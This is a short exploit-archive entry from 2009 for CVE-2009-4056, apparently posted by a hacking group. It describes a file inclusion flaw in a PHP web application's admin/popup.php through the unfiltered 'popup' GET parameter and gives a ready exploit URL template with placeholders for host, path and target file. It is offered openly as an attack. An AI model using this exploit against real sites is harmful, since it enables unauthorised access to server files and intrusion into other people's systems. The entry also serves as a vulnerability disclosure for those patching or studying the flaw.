Author: MizoZ type: webapps platform: php port: date_added: 2009-11-20 date_updated: verified: 1 codes: CVE-2009-4056;OSVDB-60467 tags: aliases: screenshot_url: application_url:
/* Author : MizoZ [from MA] Group : EvilWay Email : mizozx[at]gmail[dot]com Greetz : Zuka !! Good luck DZ :) */ The vulnerability is in the file admin/popup.php on the get $_GET['popup'] Exploit : [HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]